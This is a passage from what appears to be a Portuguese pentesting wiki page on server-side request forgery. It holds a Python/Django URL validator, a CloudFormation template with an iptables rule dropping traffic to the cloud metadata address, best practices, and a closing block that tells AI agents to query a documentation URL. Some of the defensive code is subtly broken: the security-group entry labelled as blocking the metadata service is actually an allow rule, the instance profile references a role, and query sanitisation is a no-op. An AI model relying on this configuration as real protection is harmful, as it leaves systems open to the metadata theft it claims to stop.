                ip = ipaddress.ip_address(ip_str)
                
                # Verificar se está bloqueado
                if self.is_ip_blocked(ip):
                    raise SSRFValidationError(f"IP bloqueado: {ip}")
            
            # Cache do primeiro IP válido
            first_ip = ipaddress.ip_address(next(iter(ips)))
            self.dns_cache[hostname] = first_ip
            
            return first_ip
            
        except socket.gaierror:
            raise SSRFValidationError(f"Não foi possível resolver: {hostname}")
    
    def is_ip_blocked(self, ip):
        """Verificar se IP está bloqueado"""
        for blocked_range in self.blocked_ips:
            if ip in blocked_range:
                return True
        return False
    
    def is_safe_port(self, port):
        """Verificar se porta é segura"""
        safe_ports = {80, 443, 8080, 8443}
        return port in safe_ports
    
    def rebuild_safe_url(self, parsed_url):
        """Reconstruir URL de forma segura"""
        # Remover credenciais, fragments, parameters sensíveis
        safe_netloc = parsed_url.hostname
        if parsed_url.port:
            safe_netloc = f"{safe_netloc}:{parsed_url.port}"
        
        return parsed_url._replace(
            netloc=safe_netloc,
            params='',
            fragment='',
            query=self.sanitize_query(parsed_url.query)
        ).geturl()
    
    def sanitize_query(self, query):
        """Sanitizar query string"""
        # Implementar sanitização específica se necessário
        return query

class SSRFValidationError(Exception):
    """Exceção para erros de validação SSRF"""
    pass

# Decorator para proteção automática
def ssrf_protected(param_name='url'):
    """
    Decorator para proteger endpoints contra SSRF
    """
    def decorator(func):
        @wraps(func)
        def wrapper(request, *args, **kwargs):
            protection = SSRFSecurity()
            
            # Extrair URL do request
            url = extract_url_from_request(request, param_name)
            
            if url:
                try:
                    # Validar URL
                    safe_url = protection.validate_url(url)
                    # Substituir no request
                    replace_url_in_request(request, param_name, safe_url)
                except SSRFValidationError as e:
                    logger.warning(f"SSRF attempt blocked: {e}")
                    return HttpResponseForbidden("URL validation failed")
            
            return func(request, *args, **kwargs)
        return wrapper
    return decorator

# Uso em views Django
@ssrf_protected('webhook_url')
def webhook_endpoint(request):
    url = request.POST.get('webhook_url')
    # URL já está validada e segura
    response = requests.get(url)
    return JsonResponse({'status': 'success'})
```

### Configuração de Ambiente Cloud Seguro

```yaml
# cloudformation-ssrf-protection.yml
AWSTemplateFormatVersion: '2010-09-09'
Resources:
  # Security Group que bloqueia metadata access
  SSRFProtectionSecurityGroup:
    Type: AWS::EC2::SecurityGroup
    Properties:
      GroupDescription: Security group with SSRF protection
      SecurityGroupEgress:
        - IpProtocol: tcp
          FromPort: 80
          ToPort: 80
          CidrIp: 0.0.0.0/0
        - IpProtocol: tcp
          FromPort: 443
          ToPort: 443
          CidrIp: 0.0.0.0/0
        # Bloquear acesso ao metadata service
        - IpProtocol: tcp
          FromPort: 80
          ToPort: 80
          CidrIp: 169.254.169.254/32
          Description: Block metadata service

  # IAM Role com permissões mínimas
  SecureAppRole:
    Type: AWS::IAM::Role
    Properties:
      AssumeRolePolicyDocument:
        Version: '2012-10-17'
        Statement:
          - Effect: Allow
            Principal:
              Service: ec2.amazonaws.com
            Action: sts:AssumeRole
      Policies:
        - PolicyName: MinimalPermissions
          PolicyDocument:
            Version: '2012-10-17'
            Statement:
              - Effect: Deny
                Action:
                  - 'sts:GetCallerIdentity'
                  - 'sts:GetSessionToken'
                Resource: '*'

  # Configuração de instância segura
  SecureEC2Instance:
    Type: AWS::EC2::Instance
    Properties:
      ImageId: ami-0c02fb55956c7d316
      InstanceType: t3.micro
      SecurityGroupIds:
        - !Ref SSRFProtectionSecurityGroup
      IamInstanceProfile: !Ref SecureAppRole
      UserData:
        Fn::Base64: |
          #!/bin/bash
          # Bloquear metadata service via iptables
          iptables -A OUTPUT -d 169.254.169.254 -j DROP
          # Configurar DNS seguro
          echo "nameserver 8.8.8.8" > /etc/resolv.conf
```

***

## ⚠️ Considerações Finais

### Mitos Comuns sobre SSRF

* ❌ "Firewalls previnem SSRF" → **FALSO** (SSRF vem de dentro, contorna firewalls)
* ❌ "Só afeta aplicações em cloud" → **FALSO** (afeta qualquer app que faça requests)
* ❌ "Validação de URL básica é suficiente" → **FALSO** (DNS rebinding e outras técnicas contornam)
* ❌ "HTTPS previne SSRF" → **FALSO** (funciona igual em HTTPS)

### Boas Práticas Essenciais

1. **Never Trust User Input**: Sempre validar URLs antes de fazer requests
2. **Use Allow Lists**: Lista branca de domínios e IPs permitidos
3. **Network Segmentation**: Isolar aplicações de redes internas sensíveis
4. **Principle of Least Privilege**: Mínimas permissões para serviços cloud

### Referências e Padrões

* OWASP SSRF Prevention Cheat Sheet
* Cloud Security Alliance SSRF Guidelines
* NIST Cloud Security Best Practices
* AWS Security Best Practices for SSRF

**🔐 Lembre-se**: SSRF é uma das vulnerabilidades mais perigosas em ambientes cloud e microservices. Implemente defesas em múltiplas camadas (aplicação, rede, configuração) e mantenha monitoramento constante para detectar tentativas de exploração.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://0xmorte.gitbook.io/bibliadopentestbr/tecnicas/web/server-side-infraestrutura-web/server-side-request-forgery.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
